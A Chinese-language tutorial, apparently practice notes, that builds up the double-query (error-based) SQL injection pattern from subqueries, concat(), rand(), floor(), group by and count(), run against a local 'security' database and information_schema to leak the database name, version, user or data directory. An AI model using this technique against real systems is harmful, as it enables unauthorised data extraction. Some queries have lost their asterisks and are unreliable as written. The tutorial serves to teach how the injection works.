双查询注入前需要了解什么是子查询
子查询可以理解在一个select语句中再插入一个select 里面的select语句就是子查询
例子:select concat((select database()));
执行语句时,先从子查询进行, 先执行select database()再把结果传入到concat函数
双注入查询需要理解几个函数
- count():汇总数据函数
- rand():随机输出一个小于1的正数
- floor():把输出的结果取整
- group by语句:把结果分组输出
- concat():连接两条语句
在本地进行测试
连接数据库后使用security数据库
select concat((select database()));
显示security 当前数据库的名字了
Concat()用法
Select concat()
Rand()用法
Select rand()
这个函数就是返回大于0小于1的随机数
Floor()用法
Select floor(1.534236);
这个函数就是返回小于等于输入数的整数
-
select floor(rand()*2);
从里往外看,rand随机一个0-1的数再乘以2传给floor取整 就是说这个语句输出的结果不是0就是1 -
select concat((select database()),floor(rand()2));
还是从里往外看,select database()显示数据库名,floor(rand()2)返回的结果只有0或者1,传给concat进行拼接然后查询显示
在后面加上from+表名 可以查新到表名中的所有符合的用户
- select concat((select database()),floor(rand()*2)) from users;
由于表中用户数据很多,容易产生 很多随机值 所以现在要用group by语句进行分组
- select concat((select database()),floor(rand()*2))as a from information_schema.tables group by a;
这句语句的意思就是从information_schema.tables 中查询到的结果拼接后取一个别名a,然后使用它进行分组,这样相同的security0为一组,security1为一组 就只有两个结果了
其中表可以换成information_schema.columns database()处也可以替换成任意想查询的函数。Eg: version() user() datadir()
最后呢加入聚合函数count(*)
- select count(), concat((select database()), floor(rand()2))as a from information_schema.tables group by a;